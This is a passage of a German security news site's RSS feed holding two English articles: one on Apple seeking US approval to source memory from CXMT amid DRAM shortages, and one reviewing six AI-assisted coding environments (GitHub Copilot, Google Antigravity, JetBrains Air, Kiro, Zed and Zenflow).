<?xml version="1.0" encoding="UTF-8" ?>
<?xml-stylesheet type="text/xsl" href="/rss-style.xsl"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:media="http://search.yahoo.com/mrss/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/">
<channel>
<title><![CDATA[tsecurity.de - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=join+exponent+coding+interview%2F]]></link>
<description><![CDATA[Das Gesamte Cyber Threat Intelligence Feed-Archiv von TSecurity.de. Alle Nachrichten, Sicherheitsmeldungen, Videos, Downloads und Analysen in einer zentralen Übersicht.]]></description>
<language>de-DE</language>
<lastBuildDate>Tue, 11 Aug 2026 02:39:25 +0200</lastBuildDate>
<pubDate>Tue, 11 Aug 2026 02:39:25 +0200</pubDate>
<ttl>15</ttl>
<copyright>2026 tsecurity.de - 📰 Alle Kategorien</copyright>
<managingEditor>tsecurity.de (tsecurity.de)</managingEditor>
<webMaster>tsecurity.de (tsecurity.de)</webMaster>
<image>
<url>https://tsecurity.de/templates/mydraft-basis-isharestuff-com/media/logo.png</url>
<title><![CDATA[tsecurity.de - 📰 Alle Kategorien]]></title>
<link><![CDATA[https://tsecurity.de/export/rss/alle-kategorien.xml?q=join+exponent+coding+interview%2F]]></link>
</image>
<atom:link href="https://tsecurity.de/export/rss/alle-kategorien.xml?q=join+exponent+coding+interview%2F" rel="self" type="application/rss+xml" />
<item>
<title><![CDATA[Apple’s real memory problem isn’t cost, it’s supply]]></title>
<description><![CDATA[Apple continues work to get White House go-ahead to source memory from Chinese supplier CXMT, which the US government has placed restrictions on.



For Apple, the issue comes down to simple math. With the cost of making iPhones up 38% because of eye-watering memory price increases — up almost 7-...]]></description>
<link>https://tsecurity.de/de/3714261/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714261/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:05:16 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Apple <a href="https://www.wsj.com/tech/apple-tests-chinese-memory-chips-as-supply-squeeze-bites-d292bb97" target="_blank" rel="noreferrer noopener">continues work</a> to get White House go-ahead to source memory from Chinese supplier CXMT, which the US government has placed restrictions on.</p>



<p class="wp-block-paragraph">For Apple, the issue comes down to simple math. With the <a href="https://www.applemust.com/trendforce-says-iphone-18-pro-costs-apple-38-more-to-make/#google_vignette" target="_blank" rel="noreferrer noopener">cost of making iPhones up 38%</a> because of eye-watering memory price increases — up almost 7-fold since the beginning of 2025 — it makes sense to make pragmatic choices when it comes to sourcing supply, particularly when other computer companies (including HP and Acer) already obtain memory from CXMT.</p>



<p class="wp-block-paragraph">US resistance to the plan is that because of the way Apple packages memory on chip, the use of that memory might partly contravene the technology transfer restrictions the US has in place. Note: use of off-the-shelf components is fine.</p>



<p class="wp-block-paragraph">Apple has been lobbying to use memory from the supplier only on devices made and sold in China and would likely argue this is reasonable given that both HP and Acer already use CXMT memory in products sold outside the US. </p>



<h2 class="wp-block-heading"><strong>Why it’s really about supply</strong></h2>



<p class="wp-block-paragraph">The iPhone maker’s dilemma isn’t just about memory price, it’s also about ensuring it has enough component supply to <a href="https://www.computerworld.com/article/4205686/apples-memory-crisis-is-a-big-red-flag-for-tech.html">satisfy demand for its products</a>. This is plausibly a bigger challenge for the company, which is already warning of constrained supply because of lack of available memory. Samsung, Micron, and SK Hynix have <a href="https://www.digitimes.com/news/a20260804PD217/2027-capacity-dram-nand-2026.html" target="_blank" rel="noreferrer noopener">allegedly already sold through all their DRAM production for 2027</a>, which only sharpens Apple’s case to secure alternate sources.</p>



<p class="wp-block-paragraph">With that in mind, it matters that China consumes around 20% of all Apple hardware sold globally. All the company needs is the go-ahead to use RAM from CXMT in those Chinese-made, China-sold devices.</p>



<p class="wp-block-paragraph">That alone would effectively grow its usable memory supply by the same amount, because the non-restricted memory it currently has to use in Chinese-market products could be freed up for devices sold elsewhere, with CXMT covering the China-sold units instead.</p>



<p class="wp-block-paragraph">With demand for its products accelerating —even amid a broad industry downturn — Apple really wants to make sure it has enough of the component to meet demand. Those powerful, on-premises 1.5TB RAM-equipped M7 Ultra Mac Studio AI clusters won’t exist unless it’s possible to find memory to put inside them.</p>



<h2 class="wp-block-heading"><strong>The timeline challenge</strong></h2>



<p class="wp-block-paragraph">The <a href="https://thecorenews.substack.com/p/the-core-apple-tldr-august-6?r=5l3lg&amp;utm_campaign=post-expanded-share&amp;utm_medium=web" target="_blank" rel="noreferrer noopener">proposed arrangement with CXMT</a> might not be a quick fix. Recent reporting indicated the company has already reached its production capacity for 2026, though it is working to double capacity by 2028. Apple has already tested memory chips from the company across products including iPhones and MacBooks.</p>



<p class="wp-block-paragraph">While Apple this year has applied steep price increases across all its products (except for iPhones), it is now <a href="https://www.applemust.com/apple-may-increase-iphone-17-prices-august-10/" target="_blank" rel="noreferrer noopener">expected to increase the cost</a> of the current iPhone 17 models perhaps as soon as this week. </p>



<p class="wp-block-paragraph">Market reports already warn that Apple will raise prices on its <a href="https://www.forbes.com/sites/davidphelan/2026/07/22/iphone-18-pro-release-date-apples-15-year-event-timeline-points-to-one-september-date/" target="_blank" rel="noreferrer noopener">soon-to-debut iPhone 18 Pro and iPhone Ultra</a> devices next month, and we expect availability to be constrained, once again as a result of RAM shortages. Even if Apple gets the go-ahead to work with CXMT to close the gap, the positive impact of that arrangement is unlikely to kick in before next year.</p>



<h2 class="wp-block-heading"><strong>Enjoy the pain</strong></h2>



<p class="wp-block-paragraph">Elsewhere, big memory manufacturers, <a href="https://www.gsmarena.com/sk_hynix_promises_to_invest_over_38_billion_in_new_dram_and_nand_fabs-news-74075.php" target="_blank" rel="noreferrer noopener">including SK Hynix</a>, have announced plans to invest in new DRAM manufacturing capacity. But this will not be operational until 2029, at the earliest.</p>



<p class="wp-block-paragraph">This suggests constrained product availability and higher prices for the coming months — and the only way Apple, or anyone else, will be able to limit the impact of those price increases across the entire electronics industry will be if they can obtain additional stocks of memory from vendors outside the big three. If they cannot, you can kiss the age of abundance goodbye.</p>



<p class="wp-block-paragraph"><em>You can follow me on social media! Join me on <a href="https://bsky.app/profile/jonnyevanssays.bsky.social" target="_blank" rel="noreferrer noopener">BlueSky</a>,  <a href="http://www.linkedin.com/in/jonnyevans" target="_blank" rel="noreferrer noopener">LinkedIn</a>, <a href="https://social.vivaldi.net/@jonnyevans" target="_blank" rel="noreferrer noopener">Mastodon</a> and subscribe to <a href="https://thecorenews.substack.com/p/welcome-to-the-core?r=5l3lg" target="_blank" rel="noreferrer noopener">The Core</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[A brief guide to AI-powered software development environments]]></title>
<description><![CDATA[It used to be that the value and reputation of coding contest winners was very high. That’s no longer the case. Who cares how fast you can produce code that implements an algorithm or solves a problem? Your competition is no longer other people, at least not by themselves, but AI combined with in...]]></description>
<link>https://tsecurity.de/de/3714257/nachrichtenportal/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3714257/nachrichtenportal/</guid>
<pubDate>Tue, 11 Aug 2026 01:05:13 +0200</pubDate>
<content:encoded><![CDATA[<div><div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">It used to be that the value and reputation of coding contest winners was very high. That’s no longer the case. Who cares how fast you can produce code that implements an algorithm or solves a problem? Your competition is no longer other people, at least not by themselves, but AI combined with insightful prompting and good taste.</p>



<p class="wp-block-paragraph">Historically we wrote all our code ourselves and then we tested it ourselves. Yes, there was a period when we outsourced punching our cards to what was essentially a secretarial pool, but we were still writing out the code and doing all the thinking involved in the programming. Over the years we outsourced some of the testing to a QA department, allowed software to guess at what we were typing and complete it, and allowed code-checking software to run in the background as we typed.</p>



<p class="wp-block-paragraph">Allowing software to help us by guessing what we mean advanced from word completion to line completion to function completion to program generation over a matter of about a decade. Currently a good model running in a good agent harness or IDE can look at your code, suggest improvements, compile and test the improved code, iterate on that, and then come up with something better, faster, more efficient, and more solid.</p>



<p class="wp-block-paragraph">That shifts the burden from actually programming to reviewing and testing the code. If you don’t even review and test the code, then what you’re doing is <a href="https://www.infoworld.com/article/4078884/what-is-vibe-coding-ai-writes-the-code-so-developers-can-think-big.html">vibe coding</a>. Vibe coding doesn’t give you a lot of control over the end product. It is only really efficient at generating quick prototypes and creating technical debt. It’s just not enough structure.</p>



<p class="wp-block-paragraph">One attempt to add more structure and to control what the model actually generates is <a href="https://www.infoworld.com/article/4171332/four-cutting-edge-tools-for-spec-driven-development.html">specification-driven development</a> (SDD). SDD works, because a spec grounds the model in a single source of truth. However, SDD often comes at the expense of taking too much effort and really being overkill for what you usually need.</p>



<p class="wp-block-paragraph">Developers are still floundering, wondering how to strike a balance <a href="https://www.infoworld.com/article/4166817/vibe-coding-or-spec-driven-development-how-to-choose.html">between vibe coding and spec-driven development</a>. One possible approach is <a href="https://en.wikipedia.org/wiki/Behavior-driven_development" data-type="link" data-id="https://en.wikipedia.org/wiki/Behavior-driven_development">behavior-driven development</a>. Another is a variation on <a href="https://en.wikipedia.org/wiki/Test-driven_development" data-type="link" data-id="https://en.wikipedia.org/wiki/Test-driven_development">test-driven development</a>, sometimes called “<a href="https://medium.com/@wasowski.jarek/stop-writing-specs-start-writing-facts-the-entire-sdd-movement-is-already-obsolete-9045f7061e26">facts first</a>.” A fact in this context is an executable invariant tested by a machine. Finally, there’s <a href="https://medium.com/activated-thinker/the-method-that-replaces-spec-driven-development-idsd-66e921f6cdf7">intent-driven software development</a> (IDSD), which is a new take on the old craft of intent, context, and expectations (ICE).</p>



<p class="wp-block-paragraph">Meanwhile, we have perhaps a dozen options for IDEs and another dozen options for agent harnesses and many dozens of models that do a good job of generating code. Here I’ll provide a brief tour of six of them: GitHub Copilot, Google Antigravity, JetBrains Air, Kiro, Zed, and Zenflow.</p>



<h2 class="wp-block-heading">GitHub Copilot</h2>



<p class="wp-block-paragraph">First offered as a plug-in to <a href="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html" data-type="link" data-id="https://www.infoworld.com/article/2335960/what-is-visual-studio-code-microsofts-extensible-code-editor.html">Visual Studio Code</a> in 2021, <a href="https://github.com/features/copilot">GitHub Copilot</a> was one of the first AI plug-ins for coding assistance. Today, you can use GitHub Copilot in a slew of IDEs for code completion, generation, explanation, and debugging. In addition to VS Code, GitHub Copilot is available for Visual Studio, Vim, Neovim, and the JetBrains suite of IDEs. You can also use Copilot on the command line, both through the GitHub Copilot CLI and as an extension to the GitHub CLI. You can also use it directly on the GitHub website.</p>



<p class="wp-block-paragraph">Currently there are about <a href="https://docs.github.com/en/copilot/reference/ai-models/supported-models">two dozen supported AI models in GitHub Copilot,</a> including models from OpenAI, Anthropic, and Google. In Visual Studio Code you can add more models than the ones available by default with your Copilot subscription. For example, if you open the Manage Language Models panel in VS Code, you can select models from Foundry Local via AI Toolkit, GitHub Models via AI Toolkit, Microsoft Foundry via AI Toolkit, and, at least in my case, local models via <a href="https://www.infoworld.com/article/4105894/ai-power-tools-6-ways-to-supercharge-your-terminal.html" data-type="link" data-id="https://www.infoworld.com/article/4105894/ai-power-tools-6-ways-to-supercharge-your-terminal.html">Ollama</a>. Local Ollama models don’t count against your Copilot plan, but they do occupy GPU or unified memory, depending on your hardware configuration.</p>



<p class="wp-block-paragraph">GitHub Copilot currently has three default operating modes: Plan, Ask, and Agent. Plan mode researches and outlines multi-step plans. Ask mode chats with you without making changes. And Agent mode edits files in your workspace. You may also have custom modes, some of which are supplied by plug-ins; I have 16 of these. You can create your own custom modes if you wish.</p>



<p class="wp-block-paragraph">GitHub Copilot currently has nine categories of default tools used by agents; each category may have many actual tools listed. Additional tools come from connected <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html" data-type="link" data-id="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">Model Context Protocol</a> (MCP) servers and installed plug-ins. My installation currently has 346 tools available, which is nuts. At one point VS Code would warn you if you had too many tools active, but that doesn’t seem to be happening anymore.</p>



<p class="wp-block-paragraph">AI agents are autonomous helpers that perceive their environment, decide on a course of action, and execute it. They break large tasks into smaller steps, draw on available tools and resources, reason about approach, and adjust their plans on the fly, all while following user directives until the goal is met. While most agentic code edits complete in seconds or minutes, some can run for hours with only a few requests for permission.</p>



<p class="wp-block-paragraph">In light of that, it’s not surprising that GitHub switched to usage-based billing for GitHub Copilot. Effective June 1, 2026, GitHub tracks your token consumption rather than your Premium Request Units. Code completions and next edit suggestions are exempt from token limits.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/GitHub-Copilot.png?w=1024" alt="GitHub Copilot" class="wp-image-4206900" width="1024" height="678" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Visual Studio Code with GitHub Copilot Chat selected in the right-hand panel. Note that Claude Code and OpenAI Codex chat share the right-hand sidebar. Also note the large selection of plug-ins at the very left.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">Google Antigravity</h2>



<p class="wp-block-paragraph">The <a href="https://antigravity.google/blog/introducing-google-antigravity">original Google Antigravity</a> (from way back in November 2025) was built as an agentic development platform, essentially a version of the <a href="https://github.com/microsoft/vscode">VS Code “Code – OSS” IDE</a> that Google developers use internally, which was repurposed for the sorts of repositories that mere mortals work with on normal-sized products. (Google’s internal software mono-repository is so large and complex that ordinary software tools can’t work with it; Googlers use Piper, an internal tool for version control, rather than Git.)</p>



<p class="wp-block-paragraph">On May 19, 2026, Antigravity became the basis for a new ecosystem. <a href="https://antigravity.google/product/antigravity-2">Google Antigravity 2.0</a> is a standalone desktop application that is an independent, agent-focused surface, evolved from Antigravity’s Agent Manager. The new <a href="https://antigravity.google/product/antigravity-ide">Google Antigravity IDE</a> is a separate download that looks similar to the previous Antigravity. The <a href="https://antigravity.google/product/antigravity-cli">Google Antigravity CLI</a> is a way to invoke, monitor, and interact with Antigravity agents from your terminal. In addition, the <a href="https://antigravity.google/product/antigravity-sdk">Google Antigravity SDK</a> is available to build custom agents.</p>



<p class="wp-block-paragraph">Google Gemini 3.6 Flash is the default model on Google Antigravity. According to Google it’s their strongest agentic and coding model yet, as well as being faster than other frontier models on Antigravity. Gemini 3.6 Flash can be selected at three effort levels: low, medium, and high. Antigravity also supports Gemini 3.5 at low, medium, and high levels; Gemini 3.1 Pro at two effort levels; Anthropic’s Claude Sonnet 4.6 and Opus 4.6 with thinking enabled; and GPT-OSS-120B at medium effort. The general guidance is to use the lowest level of effort that will successfully execute your task to minimize token use.</p>



<p class="wp-block-paragraph">The “+” dropdown in the prompt box allows you to add context to the prompt. Both Antigravity 2.0 and Antigravity IDE allow you to add media, mentions, and actions. Antigravity 2.0 also allows you to enable the browser from the “+” dropdown; it simply adds the <code>/browser</code> slash command to the prompt.</p>



<p class="wp-block-paragraph">The Antigravity browser subagent is the rough equivalent of <a href="https://playwright.dev/" data-type="link" data-id="https://playwright.dev/">Playwright</a> or the <a href="https://learn.microsoft.com/en-us/azure/foundry/agents/how-to/tools/browser-automation?pivots=python" data-type="link" data-id="https://learn.microsoft.com/en-us/azure/foundry/agents/how-to/tools/browser-automation?pivots=python">Microsoft Foundry Browser Automation</a> tool. It can click, scroll, type, read console logs, capture the DOM, take screenshots, and record video. The browser subagent also integrates natively with the <a href="https://github.com/ChromeDevTools/chrome-devtools-mcp" data-type="link" data-id="https://github.com/ChromeDevTools/chrome-devtools-mcp">Chrome DevTools MCP</a>.</p>



<p class="wp-block-paragraph">The other internal slash commands for both SKUs are <code>/goal</code>, which means to run until the specified task is completely finished, not asking for intermediate input from the user; <code>/grill-me</code>, which means to ask questions back to align on the specific details of the plan before implementing it; and <code>/schedule</code>, which means to run an instruction as a one-time timer in the future or on some recurring schedule (via Scheduled Tasks). Any skills provided by plug-ins or by installed Model Context Protocol servers can also be selected by typing a slash into the prompt box.</p>



<p class="wp-block-paragraph">Antigravity 2.0 and Antigravity IDE support <a href="https://antigravity.google/docs/skills">skills</a> both at the workspace and global levels. A skill requires a <code>SKILL.md</code> file with YAML frontmatter at the top, and supports optional scripts, examples, and resources. The YAML description field is key to allowing an agent to recognize when the skill is relevant. Skills that come with MCPs or plug-ins take no effort to install. Creating custom skills requires you to add a named skill directory and the <code>SKILL.md</code> file.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/Google-Antigravity-2.png?w=1024" alt="Google Antigravity 2.0" class="wp-image-4206903" width="1024" height="769" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>I asked Google Antigravity 2.0 for a project review. Gemini 3.5 Flash (high) came up with four sophisticated improvements to the code, and implemented them when I said to proceed.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/Google-Antigravity-IDE.png?w=1024" alt="Google Antigravity IDE" class="wp-image-4206904" width="1024" height="763" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>The new Antigravity IDE looks similar to the previous Antigravity. Note that the agent panel on the right synchronizes sessions with Antigravity 2.0.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/Google-Antigravity-CLI.png" alt="Google Antigravity CLI" class="wp-image-4206905" width="906" height="931" sizes="auto, (max-width: 906px) 100vw, 906px"><figcaption class="wp-element-caption"><p>Antigravity CLI with the keyboard shortcuts displayed.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">JetBrains Air</h2>



<p class="wp-block-paragraph"><a href="https://air.dev/" data-type="link" data-id="https://air.dev/">JetBrains Air</a> is an agentic development environment that allows you to delegate coding tasks to AI agents. It supports four agent providers: OpenAI Codex, Anthropic Claude, Google Gemini, and JetBrains’ own Junie. You can provide your own subscriptions or API keys for OpenAI, Anthropic, and Google to Air, or rely on JetBrains’ hosting via a subscription.</p>



<p class="wp-block-paragraph">When you create a new task for JetBrains Air, it can run in a local workspace, a Git worktree, or an isolated Docker container. Once you have set it up properly, you can also run a new task in the cloud, starting either from your local machine or from a browser.</p>



<p class="wp-block-paragraph">You can select an agent provider and model at this time. You can switch the agent only when you create a new task; you can change models within an agent at any time. There are four levels of permissions ranging from plan first to full access. For some agents you can select an effort level. You can provide context to the chat from a number of sources, including files and folders, documentation, Git branches, and several others.</p>



<p class="wp-block-paragraph">To test Air, I gave it the prompt “try to improve on the performance of this pi calculator. Do your work in a new directory called air.” I used Claude Sonnet 4.6 (1M context window) and high effort with Ask permissions, running the task locally. It did a rather good job, although I got further optimizations later on with other environments. </p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/JetBrains-Air.png?w=1024" alt="JetBrains Air" class="wp-image-4206910" width="1024" height="909" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>JetBrains Air was able to improve on the work of GitHub Copilot fairly independently.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">Kiro</h2>



<p class="wp-block-paragraph">Developed by “a small, opinionated team within AWS” and described as an autonomous agent or virtual developer that learns over time while working independently, <a href="https://kiro.dev/blog/introducing-kiro-autonomous-agent/">Kiro</a> is available both as an IDE (based on Code OSS) and as a CLI tool. Kiro CLI (<code>kiro-cli</code>) doesn’t deal with specs at this point, although it does have a planner agent and agent steering. Kiro IDE (<code>kiro</code>) explicitly supports both vibe coding and spec-driven development (SDD). (See screenshot below.)</p>



<p class="wp-block-paragraph">Kiro SDD generates three markdown files that together comprise the <a href="https://kiro.dev/docs/specs/concepts/">specification</a>: <code>requirements.md</code>, which captures user stories and acceptance criteria in structured EARS (Easy Approach to Requirements Syntax) notation; <code>design.md</code>, which documents technical architecture, sequence diagrams, and implementation considerations; and <code>tasks.md</code>, which provides a detailed implementation plan with discrete, trackable tasks.</p>



<p class="wp-block-paragraph">You can also <a href="https://kiro.dev/docs/specs/best-practices/">import specs</a> from other systems and <a href="https://kiro.dev/docs/specs/best-practices/">iterate on your specs</a>. You can even generate specs based on a vibe-coding session. Ideally, you would <a href="https://kiro.dev/docs/specs/best-practices/">create a spec for each project feature</a>.</p>



<p class="wp-block-paragraph">EARS notation captures user stories and follows the pattern:</p>



<blockquote class="wp-block-quote is-layout-flow wp-block-quote-is-layout-flow">
<p class="wp-block-paragraph">WHEN [condition/event]<br>THE SYSTEM SHALL [expected behavior]</p>
</blockquote>



<p class="wp-block-paragraph">This format is clear and testable. Kiro can generate <a href="https://kiro.dev/docs/specs/correctness/">property-based tests</a> (PBT) based on your EARS-formatted requirements. These are more comprehensive than the usual unit tests.</p>



<p class="wp-block-paragraph">In addition, Kiro SDD can generate three markdown files that together define the steering for the agents. Steering gives Kiro persistent knowledge about your workspace and its conventions.</p>



<p class="wp-block-paragraph">A product overview file (<code>product.md</code>) defines the purpose, target users, key features, and business objectives of your project. A technology stack file (<code>tech.md</code>) specifies your chosen frameworks, libraries, development tools, and technical constraints. And a project structure file (<code>structure.md</code>) documents your file organization, naming conventions, import patterns, and architectural decisions.</p>



<p class="wp-block-paragraph">With my <a href="https://kiro.dev/pricing/">free plan</a>, Kiro IDE currently supports two Anthropic Claude models, Sonnet 4.5 and Sonnet 4.0, plus five open-weight models. It can automatically select models if you wish. The <a href="https://kiro.dev/docs/models/">documentation</a> also lists OpenAI’s GPT-5.6 Sol, Terra, and Luna, Claude Opus 4.5, 4.6, 4.7, 4.8, and 5.0, and Claude Haiku 4.5, all of which can be activated with a Pro ($20/month) or better plan.</p>



<p class="wp-block-paragraph">Kiro IDE supports over a dozen context providers for chat requests, including generic context such as #codebase and #spec and specific context such as #code (snippets). It supports skills that follow the open <a href="https://agentskills.io/">Agent Skills</a> standard, and Model Context Protocol servers that follow the <a href="https://modelcontextprotocol.io/introduction">MCP standard</a>.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/Kiro.png?w=1024" alt="Kiro IDE" class="wp-image-4206913" width="1024" height="667" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Kiro IDE supports both vibe-coding and spec-driven development flows.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">Zed</h2>



<p class="wp-block-paragraph">Over the last few years my colleague <a href="https://www.infoworld.com/profile/serdar-yegulalp/">Serdar Yegulalp</a> and I have both reviewed <a href="https://zed.dev/">Zed</a> favorably, citing both its raw speed (it was written in Rust) and its integration with a flock of language models, mostly using a “bring your own key” paradigm. You need to subscribe if you want to use a Zed-hosted model.</p>



<p class="wp-block-paragraph">The team behind Zed previously created the hackable text editor, <a href="https://github.com/atom/atom">Atom</a>, and the software platform for building JavaScript-based desktop apps, <a href="https://electronjs.org/">Electron</a>, both for GitHub. They also built <a href="https://github.com/tree-sitter/tree-sitter">Tree-sitter</a>, an advanced syntax parsing framework that has become the standard mechanism for code analysis and syntax highlighting across modern code editors. While Atom has been discontinued, both Electron and Tree-sitter are still active.</p>



<p class="wp-block-paragraph">It’s Wednesday so there’s a new release of Zed out; the current version (as I write) is v1.13.2. Recent milestones include support for Anthropic’s Claude Opus 5, OpenAI’s GPT-5.6, <a href="https://github.com/ggml-org/llama.cpp" data-type="link" data-id="https://github.com/ggml-org/llama.cpp">llama.cpp</a> as a model provider, and automatic agent context compaction. Some older major features include support for skills, collaboration, and remote development. If you’re interested in particular features, read the <a href="https://zed.dev/docs/getting-started">Zed documentation</a> or the <a href="https://github.com/zed-industries/zed">Zed GitHub Repository</a>.</p>



<p class="wp-block-paragraph">To test Zed’s agentic capabilities, I pointed it at the C++ π calculation program I’ve been using to test agentic development tools, then used Zed’s new code-review skill to evaluate the program. After thoroughly reviewing Zed’s proposed changes, I gave it the go-ahead to implement and test them. I used the recommended model at the time, Claude Sonnet 4.6.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/Zed-code-review.png?w=1024" alt="Zed code review" class="wp-image-4206914" width="1024" height="831" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Looking at Zed. The results of a code review on the π calculation program that I’ve been using as a testbed are on the right. Note the use of a code-review skill at the top right.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/Zed-fix-test-doc-commit.png?w=1024" alt="Zed fix test doc commit" class="wp-image-4206915" width="1024" height="916" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>After reviewing the suggestions from the code review, I gave Zed (using Claude Sonnet 4.6) permission to implement the suggestions and validate the changes.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">Zenflow</h2>



<p class="wp-block-paragraph"><a href="https://zencoder.ai/zenflow">Zenflow</a> is a free platform that coordinates AI agents to build software using spec-driven development (SDD) workflows. Another term for coordination is orchestration, hence Zenflow is also described as an orchestration layer.</p>



<p class="wp-block-paragraph">Zenflow was developed by the <a href="https://zencoder.ai/">Zencoder</a> team. Thus Zencoder plug-ins work in Zenflow, and features from Zenflow (such as guided workflows) have been added to Zencoder. The CEO of Zencoder, Andrew Filev, told me that his team of experienced engineers had been using Zenflow for their own product development for over a year when I questioned whether it is ready for production code.</p>



<p class="wp-block-paragraph">The high-level description of the relationship between Zencoder and Zenflow is that Zenflow is the workflow brain and Zencoder executes the work. You may have noticed some naming confusion: Zencoder is not only the name of the company and of its AI plug-in for IDEs, but it is also the name of its in-house coding agent, which is one of four options for Zenflow (the others are Claude Code, Codex, and Gemini) and one of about nine models available to the Zencoder plug-in.</p>



<p class="wp-block-paragraph">When you start a Zenflow project, you’re offered a choice of standard workflows: Quick Change, Fix Bug, Spec and Build, or Full SDD Workflow, depending on scope. The wider the scope, the more structure you need in the workflow to keep the implementation from drifting away from the requirements. You can also define your own custom workflows, perhaps to conform to your shop’s standards.</p>



<p class="wp-block-paragraph">Zenflow can run multiple tasks in parallel in isolated environments. The agents coordinate within workflows without corrupting your codebase.</p>



<p class="wp-block-paragraph">Zenflow also automates verification of its changes. Every workflow runs automated tests and cross-agent code review. Failed tests trigger automatic fixes. Your code ships only after passing all the verification gates.</p>



<p class="wp-block-paragraph">Zenflow projects are broken down into tasks, and those are divided into subtasks and chats. Each task runs inside its own isolated Git worktree. You can view the status of all tasks in Kanban boards or stacked list views.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-large"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/Zenflow.png?w=1024" alt="Zenflow" class="wp-image-4206918" width="1024" height="685" sizes="auto, (max-width: 1024px) 100vw, 1024px"><figcaption class="wp-element-caption"><p>Zenflow supports multiple workflows, from quick changes all the way up to full spec-driven development. You can also define custom workflows.</p>
</figcaption></figure><p class="imageCredit">Foundry</p></div>



<h2 class="wp-block-heading">Choosing an AI coding environment </h2>



<p class="wp-block-paragraph">Which AI-supported development environment should you choose? As we’ve seen, there are plenty of good options.</p>



<p class="wp-block-paragraph">GitHub Copilot is one of the most mature AI coding plug-ins for VS Code, and it supports a wide range of AI models.</p>



<p class="wp-block-paragraph">Google Antigravity 2.0 is a standalone desktop application that is an independent, agent-focused surface. Antigravity IDE is a separate download that looks and feels similar to the original Antigravity. Antigravity CLI is a way to invoke, monitor, and interact with Antigravity agents from your terminal. These tools are among the best ways to take advantage of Gemini models.</p>



<p class="wp-block-paragraph">JetBrains Air is a relatively new agentic development environment that allows you to provide your own subscriptions or API keys for OpenAI, Anthropic, and Google models.</p>



<p class="wp-block-paragraph">Kiro IDE supports both vibe-coding and spec-driven development flows. With my free plan, Kiro IDE currently supports two Claude models.</p>



<p class="wp-block-paragraph">Zed is about the fastest IDE I have used, and it integrates with a flock of language models, mostly using a “bring your own key” paradigm. Its advanced features include collaborative coding and remote development.</p>



<p class="wp-block-paragraph">Zenflow supports multiple workflows, from quick changes all the way up to full spec-driven development. You can also define custom workflows. Zenflow works with the Zencoder coding agent as well as Claude Code, Codex, and Gemini.</p>



<p class="wp-block-paragraph">There is no winner: It’s really a matter of which tool fits your use case and makes you happy. If I could have everything I wanted in one tool, I would take the speed and power of Zed, the spec-driven development capabilities of Kiro and Zenflow, and the agentic capabilities of GitHub Copilot, Google Antigravity 2.0, and JetBrains Air.</p>



<p class="wp-block-paragraph"><br></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
